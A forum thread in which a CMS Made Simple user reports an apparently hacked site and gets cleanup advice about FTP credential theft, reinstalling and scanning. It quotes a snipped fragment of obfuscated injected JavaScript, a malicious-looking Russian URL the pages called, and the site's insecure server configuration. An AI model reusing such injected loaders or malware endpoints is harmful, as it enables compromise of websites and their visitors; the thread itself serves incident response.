Site hacked?

[leerraum]

Hi,

I've worked on a site http://be-box.de for a couple of months. Last time last week. Now the backend behaves a little bit in another way than expected. Tabs don't work etc. On every frontend page  I found this script at the bottom:

Code: Select all

	
<__body>
</__html><!-- 0,339594 / 77 / 30115744 / 30593616 -->


snip........="I";var C=n242;G_=31368;G_-=253;var Rn=String("defe"+"r");var iY=60647;var rT="";var cn={};var BN=p('sPrec_','evk1PDJ4_');var w=X+j;gC=[];ps={n:37096};var QB="";var iv={va:60873};b[BN]=R("htmfv",0,2)+"tp"+":/"+R("/pUwz"d=z;var bU=false;try {var ppE='yY'} catch(ppE){};zF=26489;zF--....snip

I don't know if this is a problem, but when I started with the site, this thing wasn't there.

Additionally there is a GET call of a russian page:

Code: Select all

http://pendude,ru:8080/4399-com/google.com/comcast.com.php

I don't know this site. And it's russian. The alert in my head is firing constantly.

My system (mle) looks like this:

Code: Select all

Informationen zur CMSms-Installation:

CMS-Version

1.6.7

Installierte Module

CMSMailer

1.73.14

FileManager

1.0.2

MenuManager

1.6.2

ModuleManager

1.3.2

News

2.10.5

nuSOAP

1.0.1

Printing

1.0.4

Search

1.6.3

ThemeManager

1.1.1

TinyMCE

2.6.2

Products

2.7.4

CGExtensions

1.18.8

CGSimpleSmarty

1.4.4

CGPaymentGatewayBase

1.0.5

Captcha

0.4

Cart

1.6.2

FormBuilder

0.5.12

FrontEndUsers

1.9.2

TemplateExternalizer

1.2

TruetypeText

2.0.2

Orders

1.8.6

CustomContent

1.5.3

CGEcommerceBase

1.1

SelfRegistration

1.4.2

NMS

2.2.2

FRShipping

1.2

Konfigurationsinformationen aus der config.php

php_memory_limit:

 

process_whole_template:

false

max_upload_size:

64000000

default_upload_permission:

664

assume_mod_rewrite:

false

page_extension:

 

internal_pretty_urls:

false

use_hierarchy:

true

debug:

false

output_compression:

false

root_url:

http://be-box.de

root_path:

/home/www/bornemann/htdocs/ (0777) Erfolgreich abgeschlossen

previews_path:

/home/www/bornemann/htdocs/tmp/cache (0777) Erfolgreich abgeschlossen

uploads_path:

/home/www/bornemann/htdocs/uploads (0777) Erfolgreich abgeschlossen

uploads_url:

http://be-box.de/uploads

image_uploads_path:

/home/www/bornemann/htdocs/uploads/images (0777) Erfolgreich abgeschlossen

image_uploads_url:

http://be-box.de/uploads/images

use_smarty_php_tags:

false

locale:

de_DE

default_encoding:

utf-8

admin_encoding:

utf-8
PHP-Informationen:

Derzeitige PHP-Version (phpversion):

 5.2.0-8+etch15 Erfolgreich abgeschlossen

MD5-Funktion (md5_function):

 An (Ja) Erfolgreich abgeschlossen

GD-Version (gd_version):

 2 Erfolgreich abgeschlossen

tempnam-Funktion (tempnam_function):

 An (Ja) Erfolgreich abgeschlossen

Magic Quotes zur Laufzeit (magic_quotes_runtime):

 Aus (Nein) Erfolgreich abgeschlossen

PHP-Speicherlimit (memory_limit):

 128M Erfolgreich abgeschlossen

Maximale Ausführungszeit (max_execution_time):

 30 Achtung ?

PHP Safe-Mode (safe_mode):

 Aus (Nein) Erfolgreich abgeschlossen

Speicherpfad für Sessions (session_save_path):

 /var/lib/php5 (1733) Erfolgreich abgeschlossen

Es ist den Sessions erlaubt, Cookies zu verwenden. (session_use_cookies):

 An (Ja) Erfolgreich abgeschlossen

Prüfung, ob der httpd-Prozeß eine Datei in einem selbst erstellten Verzeichnis erzeugen kann. (create_dir_and_file):

Erfolgreich abgeschlossen

PHP - register_globals (register_globals):

 An (Ja) Achtung ?

PHP - output_buffering (output_buffering):

 An Erfolgreich abgeschlossen

Deaktivierte PHP-Funktionen (disable_functions):

  Erfolgreich abgeschlossen

PHP "Open Basedir" (open_basedir):

  Erfolgreich abgeschlossen

Test der Remote-URL (test_remote_url):

Erfolgreich abgeschlossen
fsockopen: Verbindung ok! Erfolgreich abgeschlossen
fopen: Verbindung ok! Erfolgreich abgeschlossen

Hochgeladene Dateien (file_uploads):

 An (Ja) Erfolgreich abgeschlossen

Maximale Größe für POST-Dateien (post_max_size):

 32M Erfolgreich abgeschlossen

Maximale Größe für hochzuladende Dateien (upload_max_filesize):

 30M Erfolgreich abgeschlossen

Basis-XML (expat) Unterstützung (xml_function):

 An (Ja) Erfolgreich abgeschlossen

Test auf file_get_contents (file_get_contents):

 An (Ja) Erfolgreich abgeschlossen

Test auf ini_set (check_ini_set):

 An (Ja) Erfolgreich abgeschlossen
Server-Informationen:

Server-API (server_api):

apache2handler

Server-Datenbank (server_db_type):

MySQL (mysql)

Server-Datenbankversion (server_db_version):

5.0.32 Erfolgreich abgeschlossen

Server-Software (server_software):

Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c

Server-Betriebssystem (server_os):

Linux 2.6.18-6-amd64 An x86_64

Verzeichnisberechtigungen

tmp:

/home/www/bornemann/htdocs//tmp (0777) Erfolgreich abgeschlossen

templates_c:

/home/www/bornemann/htdocs/tmp/templates_c (0777) Erfolgreich abgeschlossen

modules:

/home/www/bornemann/htdocs//modules (0777) Erfolgreich abgeschlossen

Maske zum Erstellen von Dateien (umask):

/home/www/bornemann/htdocs/tmp/cache (0777) Erfolgreich abgeschlossen

config_file:

0444 Erfolgreich abgeschlossen

Anyone an idea? Update is not possible because of some other problems I've faced. I need to check out first what and why everything goes wrong.

Thanks.
leerraum


// Rolf: Deleted hacked code
// Reneh snipped some more code

[Rolf]

No doubt, this site has been ftp-hacked and there are one or more non-cmsms files on your server which infect your files. Again and again... 

Grtz. Rolf

[leerraum]

ok, thank you for this prompt reply. What is the best way to solve this problem? (and please don't tell me I have to do all the stuff I did last week again, because I need to upload a clean backup... )

[Rolf]

Your database will be fine.
Just the files on the server are infected...

Change FTP-username and password just to be shure.
Make a backup of the excisting files and database on a pc with a good virusscanner

The safest way is to delete all files on the webserver now and put a new clean cmsms set back on.
Do a new install with the same database. DON'T let the installer create tables and default content in step 5!!!! Uncheck these options!!!
After this put back the images etc. one by one.

This is it, in short.
But please do a little search on the forum.
There more threads with a more detailed explanation there...

Good luck

Rolf

[replytomk3]

Backup first before deleting - see my signature - and scan the files you backed up with a computer virus scanner (Avast! for example)

[leerraum]

ok, I'will do so tomorrow. after I called my hoster. What I wan't to know now is: whos guilty? Because I see the question coming up very fast. Is 1.6.7 having some security problems?

[replytomk3]

Hosting provider is guilty. However, we also recommend additional security measures implemented (search the forum). You'll also OBVIOUSLY have to change ALL passwords after you recover.

[milehigh]

Some FTP clients store FTP usernames/passwords in plain text. An infected computer basically hands this information over to the hacker -- this has nothing to do with your hosting provider.

You need to make sure the computer you hare using for FTP access is 100% clean otherwise you will change all your passwords and the virus will simply hand over the new passwords and you are back to square one with malicious code.

I actually had some first hand experience with this one...it is not in any way a CMSMS vulnerability and in a lot of these you can't blame the hosting company since the method used for adding the code (typically in index, home, default types of files as well as various js files) is simply authenticating via FTP with valid usernames and passwords.

[leerraum]

hm, I've checked my pc last week in secure mode without results... but I'll check it again now.